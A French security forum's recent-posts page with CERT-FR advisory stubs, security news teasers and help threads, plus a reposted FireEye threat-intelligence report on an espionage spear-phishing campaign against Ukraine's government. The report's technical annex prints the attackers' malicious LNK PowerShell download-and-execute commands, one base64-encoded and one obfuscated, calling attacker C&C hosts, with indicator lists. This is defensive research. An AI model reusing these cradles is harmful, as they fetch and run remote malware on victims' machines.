Messages récents

Pages: 1 ... 3 4 5 6 7 8 9 [10]
91
CERTFR-2019-AVI-171 : Multiples vulnérabilités dans Foxit Reader et PhantomPDF (16 avril 2019)

De multiples vulnérabilités ont été découvertes dans Foxit Reader et PhantomPDF. Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance et une atteinte à la confidentialité des données.


Source: CERTFR-2019-AVI-171 : Multiples vulnérabilités dans Foxit Reader et PhantomPDF (16 avril 2019)
92
Windows 7 / Re : Net Frameworks
« Dernier message par jeanda le avril 16, 2019, 15:52:52 »
Bonjour,

Bon j'ai laissé quelques jours passer, le problème persiste que dois-je faire maintenant? merci... :AAC
93
CERTFR-2019-AVI-170 : Vulnérabilité dans Apache Tomcat (15 avril 2019)

Une vulnérabilité a été découverte dans Apache Tomcat. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.


Source: CERTFR-2019-AVI-170 : Vulnérabilité dans Apache Tomcat (15 avril 2019)
94
News / [Sophos]Watch out! Don’t fall for the Instagram ‘Nasty List’ phishing attack
« Dernier message par igor51 le avril 16, 2019, 15:00:08 »
Watch out! Don’t fall for the Instagram ‘Nasty List’ phishing attack

Instagram users have been receiving odd messages from followers expressing shock that their accounts have somehow ended up on something called the “Nasty List.”
Source: Watch out! Don’t fall for the Instagram ‘Nasty List’ phishing attack
95
News / [AVAST]Avast Secure Browser Updates to Aspen | Avast
« Dernier message par igor51 le avril 16, 2019, 15:00:08 »
Avast Secure Browser Updates to Aspen | Avast

How often do you sit at your computer without a browser window open? If you’re like us, the answer is never. If we’re on our machines, there is always at least one window open to the wilds of the internet. That’s why we created Avast Secure Browser — we realized it would be a good idea to frontload that window to the internet with tools to protect your privacy, strengthen your security, and – because we just couldn’t help ourselves – amp up your speed.


Source: Avast Secure Browser Updates to Aspen | Avast
96
News / [Sophos]Google’s location history data shared routinely with police
« Dernier message par igor51 le avril 16, 2019, 14:00:02 »
Google’s location history data shared routinely with police

Law enforcement officials in the US have been routinely mining Google’s location history data for criminal investigations.
Source: Google’s location history data shared routinely with police
97
News / [Sophos]US feds’ names, home and email addresses hacked and posted online
« Dernier message par igor51 le avril 16, 2019, 13:00:07 »
US feds’ names, home and email addresses hacked and posted online

A group of hackers that doxxed thousands of federal law enforcement employees last week has struck again.
Source: US feds’ names, home and email addresses hacked and posted online
98
News / [Sophos]Security weakness in popular VPN clients
« Dernier message par igor51 le avril 16, 2019, 12:00:07 »
Security weakness in popular VPN clients

Numerous enterprise VPN clients could be vulnerable to a potentially serious security weakness that could be used to spoof access.
Source: Security weakness in popular VPN clients
99
Désinfections / Re : UC 100% PC fixe au ralenti
« Dernier message par nicoolas le avril 16, 2019, 11:21:11 »
Bonjour,

Navré pour le temps d'attente !

Nous allons commencer par établir un diagnostic du PC . Pour cela ,
Télécharger Farbar Recovery Scan Tool (de Farbar) sur le Bureau.(IMPORTANT)
Attention: Il faut  lancer la version compatible avec  le  système : 32 ou  64bits.
Cliquer ici pour la version 32 bits
Cliquer ici pour la version 64 bits

Info : comment savoir quelle version de Windows j'utilise ?
Sous IE9 ou IE10, le filtre SmartScreen déclenche une alerte. Cliquer sur Actions puis sur Exécuter quand même
  • Faire un click droit  sur l'outil, puis executer en tant qu'administrateur pour le lancer. Quand l'outil se lance, cliquer sur Oui pour accepter le disclaimer.
  • Cliquer sur le bouton  Analyser.



  • L'outil va créer un rapport nommé FRST.txt, enregistré dans le même dossier que l'outil.
  • A son premier lancement, l'outil va aussi créer un fichier nommé Addition.txt.
Poster les deux rapports générés.

100
Spear Phishing Campaign Targets Ukraine Government and Military;
Infrastructure Reveals Potential Link to So-Called Luhansk People's Republic


In early 2019, FireEye Threat Intelligence identified a spear
  phishing email targeting government entities in Ukraine. The spear
  phishing email included a malicious LNK file with PowerShell script to
  download the second-stage payload from the command and control
  (C&C) server. The email was received by military departments in
  Ukraine and included lure content related to the sale of demining machines. 


 

This latest activity is a continuation of spear phishing that
  targeted the Ukrainian Government as early as 2014. The email is
  linked to activity that previously targeted the Ukrainian Government
  with RATVERMIN. Infrastructure analysis indicates the actors behind
  the intrusion activity may be associated with the so-called Luhansk
  People's Republic (LPR).


 

The spear phishing email, sent on Jan. 22, 2019, used the subject
  "SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD," and the sender
  was forged as Armtrac, a defense manufacturer in the United Kingdom
  (Figure 1).


 


 
 
 Figure 1: The spear phishing email


 

The email included an attachment with the filename
  "Armtrac-Commercial.7z" (MD5:
  982565e80981ce13c48e0147fb271fe5). This 7z package contained
  "Armtrac-Commercial.zip" (MD5:
  e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents
  and one malicious LNK file with a substituted icon (Figure 2).


 


 
   
   
 Figure 2: LNK with substituted icon


 

       
  • Armtrac-20T-with-Equipment-35078.pdf (MD5:
        0d6a46eb0d0148aafb34e287fcafa68f) is a benign document from the       href="https://armtrac.net/wp-content/uploads/Armtrac-20T-with-Equipment-35078.pdf">official
          Armtrac website.

  •    
  • SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf (MD5:
        bace12f3be3d825c6339247f4bd73115) is a benign document from the       href="https://armtrac.net/wp-content/uploads/SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf">official
        Armtrac website.

  •    
  • SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk (MD5:
        ec0fb9d17ec77ad05f9a69879327e2f9) is a malicious LNK file that
        executes a PowerShell script. Interestingly, while the LNK file used
        a forged extension to impersonate a PDF document, the icon was
        replaced with a Microsoft Word document icon.

 

Sponsor Potentially Active Since 2014


 

Compilation times indicate that this actor, who focused primarily on
  Ukraine, may have been active since at least 2014. Their activity was
  first reported by FireEye Threat Intelligence in early 2018. They
  gradually increased in sophistication and leveraged both custom and
  open-source malware.


 

The 2018 campaign used standalone EXE or self-extracting RAR (SFX)
  files to infect victims. However, their recent activity showed
  increased sophistication by leveraging malicious LNK files. The group
  used open-source QUASARRAT and the RATVERMIN malware, which we have
  not seen used by any other groups. Domain resolutions and malware
  compile times suggest this group may have been active as early as
  2014. Filenames and malware distribution data suggest the group is
  primarily focused on targeting Ukrainian entities.


 

Association With So-Called Luhansk People's Republic


 

FireEye Threat Intelligence analysis uncovered several indications
  that the actors behind this activity have ties to the breakaway
  so-called Luhansk People's Republic (LPR).


 


  Registrant Overlap with Official So-Called LPR Website


 

Infrastructure analysis suggests these operators are linked to the
  so-called LPR and the persona "re2a1er1." The domain used as
  C&C by the previous LNK file (sinoptik[.]website) was registered
  under the email "re2a1er1@yandex.ru." The email address also
  registered the following domains.


 
   
     
   
              width="175">

24tv.ua


   
              width="175">

censor.net.ua

        width="114">

UA


   
              width="175">

fakty.ua


   
                width="175">

Volodymyr Borysovych Groysman

          width="168">

V. B. Groysman is a politician who has been the
          Prime Minister of Ukraine since April 14, 2016

        width="114">

UA


   
              width="175">

gordonua.com


   
              width="175">

ukr.net


   
              width="175">

me.gov.ua

        width="114">

UA


   
              width="175">

novaposhta.ua

          width="168">

Ukraine's largest logistics services
        company


   
              width="175">

olx.ua


   
              width="175">

online.ua


   
              width="175">

rst.ua

        width="114">

UA


   
              width="175">

Unknown

        width="168">

TV-related


   
              width="175">

sinoptik.ua

        width="114">

UA


   
              width="175">

spectator.co.uk

        width="114">

UK


   
              width="175">

Unknown

        width="168">

TV-related


   
              width="175">

uatoday.news


   
              width="175">

ukrposhta.ua


   
              width="175">

unian.net

        width="114">

Unknown


   
              width="175">

Unknown


   
     
                width="168" valign="top">

Punycode of Ministry of State
          Security of the So-Called Luhansk People’s Republic’s
        website


   
              width="175">

zik.ua


   
              width="175">

Unknown


          Domains Registered by re2a1er1@yandex.ru


          Possible Mimicked Domains


          Description


          Possible Targeted Country

24ua[.]website

A large news
          portal in Ukraine

UA

censor[.]website

A
          large news portal in Ukraine

fakty[.]website

A large
          news portal in Ukraine

UA


     

groysman[.]host

gordon.co[.]ua

A large
          mail service in Ukraine

UA


     

mailukr[.]net

A large news
          portal in Ukraine

UA

me.co[.]ua

Ukraine's
          Ministry of Economic Development and Trade

novaposhta[.]website

UA

olx[.]website

Ukraine's
          largest online ad platform

UA


     

onlineua[.]website

A large
          news portal in Ukraine

UA


     

rst[.]website

One of the
          largest car sales websites in Ukraine

satv[.]pw

UA


     

sinoptik[.]website

The
          largest weather website in Ukraine

spectator[.]website

A
          large news portal in the UK

tv.co[.]ua

UA


     

uatoday[.]website

A large
          news portal in Ukraine

UA


     

ukrposhta[.]website

State
          Post of Ukraine

UA

unian[.]pw

A large
          news portal in Ukraine

vj2[.]pw

Unknown


     

UA

xn--90adzbis.xn--c1avg

Not Applicable

UA

z1k[.]pw

A large news
          portal in Ukraine

UA

milnews[.]info

Military
        news

UA


 


  Table 1: Related infrastructure


 

One of the domains, "xn--90adzbis.xn--c1avg" is a Punycode
  of "мгблнр.орг," which is the official website of the
  Ministry of State Security of the So-Called LPR (Figure 3). Ukraine
  legislation describes so-called LPR as "temporarily occupied
  territory" and its government as an "occupying
  administration of the Russian Federation."


 


 
 
 Figure 3: Official website of the
    Ministry of State Security of the So-Called Luhansk People's
    Republic (МГБ ЛНР - Министерство Государственной Безопасности
    Луганской Народной Республики)


 

Conclusions


 

This actor has likely been active since at least 2014, and its
  continuous targeting of the Ukrainian Government suggests a cyber
  espionage motivation. This is supported by the ties to the so-called
  LPR's security service. While more evidence is needed for definitive
  attribution, this activity showcases the accessibility of competent
  cyber espionage capabilities, even to sub-state actors. While this
  specific group is primarily a threat to Ukraine, nascent threats to
  Ukraine have previously become international concerns and bear monitoring.


 

Technical Annex


 

The LNK file (SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk
  [MD5: ec0fb9d17ec77ad05f9a69879327e2f9]) included the following script
  (Figure 4) to execute a PowerShell script with Base64-encoded script:


 
   
     
          valign="top">

vbscript:Execute("CreateObject(""Wscript.Shell"").Run
          ""powershell -e

          """"aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4Ab

          wBwAH
          QAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""",
          0 :
 window.close")


 


  Figure 4: LNK file script


 

The following command (Figure 5) was received after decoding the
  Base64-encoded string:


 
   
     
          valign="top">

vbscript:Execute("CreateObject(""Wscript.Shell"").Run
          ""powershell -e iex(iwr -useb

          http://sinoptik[.]website/EuczSc)"", 0 :
        window.close")


 


  Figure 5: LNK file command


 

The PowerShell script sends a request to URL
  "http://sinoptik[.]website/EuczSc." Unfortunately, the
  server was unreachable during analysis.


 


  Network Infrastructure Linked to Attackers


 

The passive DNS records of the C&C domain
  "sinoptik[.]website" included the following IPs:


 
   
     
   
              width="208">

2018-09-17

        width="208">

78.140.167.89


   
              width="208">

2018-06-08

        width="208">

78.140.164.221


   
              width="208">

2018-03-16

        width="208">

185.125.46.158


   
              width="208">

2019-01-17

        width="208">

78.140.167.89


          Host/Domain Name


          First Seen


          IP

sinoptik[.]website

sinoptik[.]website

sinoptik[.]website

www.sinoptik[.]website


 


  Table 2: Network infrastructure linked to attackers


 

Domains previously connected to RATVERMIN (aka VERMIN) and QUASARRAT
  (aka QUASAR) also resolved to IP "185.125.46.158" and
  include the following:


 
   
     
   
              width="208">

akamainet022[.]info

        width="208">

QUASARRAT


   
              width="208">

notifymail[.]ru

        width="208">

RATVERMIN


   
              width="208">

akamainet066[.]info

        width="208">

QUASARRAT


   
              width="208">

akamainet024[.]info

        width="208">

RATVERMIN


   
              width="208">

akamaicdn[.]ru

        width="208">

QUASARRAT


   
              width="208">

cdnakamai[.]ru

        width="208">

QUASARRAT


          Malware MD5


          C&C


          Malware Family

47161360b84388d1c254eb68ad3d6dfa

242f0ab53ac5d194af091296517ec10a

07633a79d28bb8b4ef8a6283b881be0e

5feae6cb9915c6378c4bb68740557d0a

dc0ab74129a4be18d823b71a54b0cab0

bbcce9c91489eef00b48841015bb36c1


 


  Table 3: Additional malware linked to the attackers


 

RATVERMIN is a .NET backdoor that FireEye Threat Intelligence
  started tracking in March 2018. It has also been reported in public
  reports and     href="https://unit42.paloaltonetworks.com/unit42-vermin-quasar-rat-custom-malware-used-ukraine/">blog posts.


 

Operators Highly Aggressive, Proactive


 

The actor is highly interactive with its tools and has responded
  within a couple of hours of receiving a new victim, demonstrating its
  ability to react quickly. An example of this hands-on style of
  operation occurred during live malware analysis. RATVERMIN operators
  observed that the malware was running from an unintended target at
  approximately 1700 GMT (12:00 PM Eastern Standard Time on a weekday)
  and promptly executed the publicly available Hidden Tear ransomware
  (saved to disk as hell0.exe, MD5: 8ff9bf73e23ce2c31e65874b34c54eac).
  The ransomware process was killed before it could execute
  successfully. If the Hidden Tear continued execution, a file would
  have been left on the desktop with the following message:


 

"Files have been encrypted with hidden tear. Send me some
  bitcoins or kebab. And I also hate night clubs, desserts, being drunk."


 

When live analysis resumed, the threat group behind the attack
  started deleting all the analysis tools on the machine. Upon resetting
  the machine and executing the malware again, this time with a text
  file open asking why they sent ransomware, the threat group responded
  by sending the following message via RATVERMIN's C&C domain
  (Figure 6):


 
   
     

C&C to Victim
 HTTP/1.1
          200 OK
 Content-Length: 5203
 Content-Type:
          multipart/related;

          type="application/xop+xml";start="<http://tempuri[.]org/0>";boundary="uuid:67761605-

          5c90-47ac-bcd8-

          718a09548d60+id=14";start-info="application/soap+xml"

          Server: Microsoft-HTTPAPI/2.0
 MIME-Version: 1.0

          Date: Tue, 20 Mar 2018 19:01:26 GMT

          --uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14

          Content-ID: <http://tempuri[.]org/0>

          Content-Transfer-Encoding: 8bit
 Content-Type:
        application/xop+xml;charset=utf-8;type="application/soap+xml"


         

<TRUNCATED>
 Mad ?


 


  Figure 6: RATVERMIN's C&C domain message


 

Related Samples


 

Further research uncovered additional LNK files with PowerShell
  scripts that connect to the same C&C server.


 
  • Filename: Висновки.
        S021000262_1901141812000. Scancopy_0003. HP LaserJet Enterprise 700
        M775dn(CC522A).docx.lnk (Ukrainian translation: Conclusion)

             
    • MD5: fe198e90813c5ee1cfd95edce5241e25
    • Description:
              LNK file also has the substituted Microsoft Word document icon
              and sends a request to the same C&C domain
    • C&C:
            http://sinoptik[.]website/OxslV6

 
   
     

PowerShell activity (Command Line
          Arguments):

          vbscript:Execute("CreateObject(""Wscript.Shell"").Run
          ""powershell.exe -c iex(iwr -useb

          http://sinoptik[.]website/OxslV6)"", 0 :
        window.close")


 


  Figure 7: Additional LNK files with PowerShell scripts


 
  • Filename: КМУ база
        даних.zip (Ukrainian translation: Cabinet of Ministers of Ukraine
          database)
    • MD5: a5300dc3e19f0f0b919de5cda4aeb71c

    •        
    • Description: ZIP archive containing a malicious LNK
            file

 
  • Filename: Додаток.pdf
        (Ukrainian translation: Addition)
    • MD5:
            a40fb835a54925aea12ffaa0d76f4ca7
    • Description: Benign
              decoy document

 
  • Filename:
          КМУ_база_даних_органи_упр,_СГ_КМУ.rtf.lnk
    • MD5:
            4b8aac0649c3a846c24f93dc670bb1ef
    • Description: Malicious
              LNK that executes a PowerShell script
    • C&C:
            http://cdn1186[.]site/zG4roJ

 
   
     

powershell.exe
 -NoP -NonI -W
          hidden -Com "$cx=New-Object -ComObject

          MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186[.]site/zG4roJ',$False);$cx.Send();

          $cx.ResponseText|.(
          ''.Remove.ToString()[14,50,27]-Join'')"

        !%SystemRoot%\system32\shell32.dll


 


  Figure 8: Additional LNK files with PowerShell scripts


 

FireEye Detection


 

FireEye detection names for the indicators in the attack include the following:


 
   
              width="312" valign="top">          style="list-style-position: inside;">
  • INVOKE CRADLECRAFTER
              (UTILITY)
  • MALICIOUS SCRIPT CONTENT A
              (METHODOLOGY)
  • MSHTA.EXE SUSPICIOUS COMMAND LINE
                SCRIPTING (METHODOLOGY)
  • OFFICE CLIENT SUSPICIOUS
                CHILD PROCESS (METHODOLOGY)
  • PERSISTENT MSHTA.EXE
                PROCESS EXECUTION (METHODOLOGY)
  • POWERSHELL.EXE
                EXECUTION ARGUMENT OBFUSCATION (METHODOLOGY)

  •            
  • POWERSHELL.EXE IEX ENCODED COMMAND (METHODOLOGY)

  •            
  • SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

  •      

       
                  width="312" valign="top">          style="list-style-position: inside;">
             
  • 86300142_Backdoor.Win.QUASARRAT

  •          
  • 86300140_Backdoor.Win.QUASARRAT

  •          
  • 86300141_Backdoor.Win.QUASARRAT

  •          
  • Malware.archive
  • FE_Backdoor_MSIL_RATVERMIN_1

  •          
  • 33340392_Backdoor.Win.RATVERMIN

  •          
  • 33340391_Backdoor.Win.RATVERMIN

  •    
                  width="312" valign="top">          style="list-style-position: inside;">
  • FE_MSIL_Crypter

  •          
  • FE_Backdoor_MSIL_RATVERMIN_1

  •          
  • Malware.Binary.lnk
  • Malware.Binary.exe

  •          
  • Malware.archive
  • Backdoor.Win.QUASARRAT

  •          
  • Backdoor.Win.RATVERMIN
  • CustomPolicy.MVX.exe

  •          
  • CustomPolicy.MVX.65003.ExecutableDeliveredByEmail

  •        

    FireEye Endpoint Security

    FireEye Network Security

    FireEye Email Security


     

    Summary of Indicators


     


      Malicious package and LNK files


     

       
    • 982565e80981ce13c48e0147fb271fe5

    •  
    • e92d01d9b1a783a23477e182914b2454

    •  
    • ec0fb9d17ec77ad05f9a69879327e2f9

    •  
    • fe198e90813c5ee1cfd95edce5241e25

    •  
    • a5300dc3e19f0f0b919de5cda4aeb71c

    •  
    • 4b8aac0649c3a846c24f93dc670bb1ef

     


      Related File


     

         
    • 0d6a46eb0d0148aafb34e287fcafa68f (decoy document)

    •    
    • bace12f3be3d825c6339247f4bd73115 (decoy document)

    •    
    • a40fb835a54925aea12ffaa0d76f4ca7 (decoy document)

     


      Quasar RAT Samples


     

       
    • 50b1f0391995a0ce5c2d937e880b93ee

    •  
    • 47161360b84388d1c254eb68ad3d6dfa

    •  
    • 07633a79d28bb8b4ef8a6283b881be0e

    •  
    • dc0ab74129a4be18d823b71a54b0cab0

    •  
    • bbcce9c91489eef00b48841015bb36c1

    •  
    • 3ddc543facdc43dc5b1bdfa110fcffa3

    •  
    • 5b5060ebb405140f87a1bb65e06c9e29

    •  
    • 80b3d1c12fb6aaedc59ce4323b0850fe

    •  
    • d2c6e6b0fbe37685ddb865cf6b523d8c

    •  
    • dc0ab74129a4be18d823b71a54b0cab0

    •  
    • dca799ab332b1d6b599d909e17d2574c

     


      RATVERMIN


     

       
    • 242f0ab53ac5d194af091296517ec10a

    •  
    • 5feae6cb9915c6378c4bb68740557d0a

    •  
    • 5e974179f8ef661a64d8351e6df53104

    •  
    • 0b85887358fb335ad0dd7ccbc2d64bb4

    •  
    • 9f88187d774cc9eaf89dc65479c4302d

    •  
    • 632d08020499a6b5ee4852ecadc79f2e

    •  
    • 47cfac75d2158bf513bcd1ed5e3dd58c

    •  
    • 8d8a84790c774adf4c677d2238999eb5

    •  
    • 860b8735995df9e2de2126d3b8978dbf

    •  
    • 987826a19f7789912015bb2e9297f38b

    •  
    • a012aa7f0863afbb7947b47bbaba642e

    •  
    • a6ecfb897ca270dd3516992386349123

    •  
    • 7e2f581f61b9c7c71518fea601d3eeb3

    •  
    • b5a6aef6286dd4222c74257d2f44c4a5

    •    
    • 0f34508772ac35b9ca8120173c14d5f0 (RATVERMIN's keylogger)

    •    
    • 86d2493a14376fbc007a55295ef93500 (RATVERMIN's encryption
        tool)
    • 04f1aa35525a44dcaf51d8790d1ca8a0 (RATVERMIN helper
        functions)
    • 634d2a8181d08d5233ca696bb5a9070d (RATVERMIN helper
        functions)
    • d20ec4fdfc7bbf5356b0646e855eb250 (RATVERMIN helper
        functions)
    • 5ba785aeb20218ec89175f8aaf2e5809 (RATVERMIN helper
        functions)
    • b2cf610ba67edabb62ef956b5e177d3a (RATVERMIN helper
        functions)
    • 7e30836458eaad48bf57dc1decc27d09 (RATVERMIN helper
        functions)
    • df3e16f200eceeade184d6310a24c3f4 (RATVERMIN crypt
        functions)
    • 86d2493a14376fbc007a55295ef93500 (RATVERMIN crypt
        functions)
    • d72448fd432f945bbccc39633757f254 (RATVERMIN task
          scheduler tool)
    • e8e954e4b01e93f10cefd57fce76de25 (RATVERMIN
          task scheduler tool)

     


      Hidden Tear Ransomware


     

       
    • 8ff9bf73e23ce2c31e65874b34c54eac

     


      Malicious Infrastructure


     
    • akamainet022[.]info

    •  
    • akamainet066[.]info
    • akamainet024[.]info

    •  
    • akamainet023[.]info
    • akamainet066[.]info

    •  
    • akamainet021[.]info
    • www.akamainet066[.]info

    •  
    • www.akamainet023[.]info
    • www.akamainet022[.]info

    •  
    • www.akamainet021[.]info
    • akamaicdn[.]ru

    •  
    • cdnakamai[.]ru
    • mailukr[.]net

    •  
    • notifymail[.]ru
    • www.notifymail[.]ru

    •  
    • tech-adobe.dyndns[.]biz
    • sinoptik[.]website

    •  
    • cdn1186[.]site
    • news24ua[.]info

    •  
    • http://sinoptik[.]website/EuczSc

    •  
    • http://sinoptik[.]website/OxslV6

    •  
    • http://cdn1186[.]site/zG4roJ
    • 206.54.179.196

    •  
    • 195.78.105.23
    • 185.125.46.24
    • 185.158.153.222

    •  
    • 188.227.16.73
    • 212.116.121.46
    • 185.125.46.158

    •  
    • 94.158.46.251
    • 188.227.75.189

     


      Correlated Infrastructure


     
    • 78.140.167.89 (pdns)

    •    
    • 1ua[.]eu (pdns)
    • 24ua[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • cdn1214[.]site (pdns)

    •    
    • censor[.]website (pdns, registered by re2a1er1@yandex.ru)

    •    
    • fakty[.]website (pdns, registered by re2a1er1@yandex.ru)

    •    
    • gismeteo[.]website (pdns, registered by re2a1er1@yandex.ru)

    •    
    • lmeta[.]eu (pdns)
    • me.co[.]ua (pdns, registered by
        re2a1er1@yandex.ru)
    • milnews[.]info (pdns)
    • mj2[.]pw
          (pdns, registered by re2a1er1@yandex.ru)

    •    
    • novaposhta[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • olx[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • www.olx[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • onlineua[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • r2a[.]pw (pdns, registered by
        re2a1er1@yandex.ru)
    • rarnbier[.]ru (pdns)

    •    
    • rbc[.]website (pdns)
    • rst[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • satv[.]pw (pdns, registered by
        re2a1er1@yandex.ru)
    • slaviasoft[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • tv.co[.]ua (pdns, registered by
        re2a1er1@yandex.ru)
    • uatoday[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • ukrnews[.]website (pdns, registered by
        re2a1er1@yandex.ru)
    • www.ukrnews[.]website (pdns, registered
          by re2a1er1@yandex.ru)
    • ukrposhta[.]website (pdns,
          registered by re2a1er1@yandex.ru)
    • unian[.]pw (pdns)

    •    
    • vj2[.]pw (pdns, registered by re2a1er1@yandex.ru)

    •    
    • windowsupdate.kiev[.]ua (pdns)
    • xn--90adzbis.xn--c1avg
          (registered by re2a1er1@yandex.ru)
    • z1k[.]pw (pdns,
          registered by re2a1er1@yandex.ru)
    • 188.164.251.61
        (pdns)
    • 188.227.17.68 (pdns)
    • 206.54.179.160 (pdns of
          many malicious domains)
    • 208.69.116.100 (pdns)

    •    
    • 208.69.116.144 (pdns)
    • 5.200.53.181 (pdns)

    •    
    • 78.140.162.22 (pdns)
    • 78.140.167.137 (pdns)

    •    
    • 88.85.86.229 (pdns)
    • 88.85.95.72 (pdns)

    •    
    • 94.158.34.2 (pdns)
    • 94.158.47.228 (pdns)

    Source: Spear Phishing Campaign Targets Ukraine Government and Military;
    Infrastructure Reveals Potential Link to So-Called Luhansk People's Republic
    Pages: 1 ... 3 4 5 6 7 8 9 [10]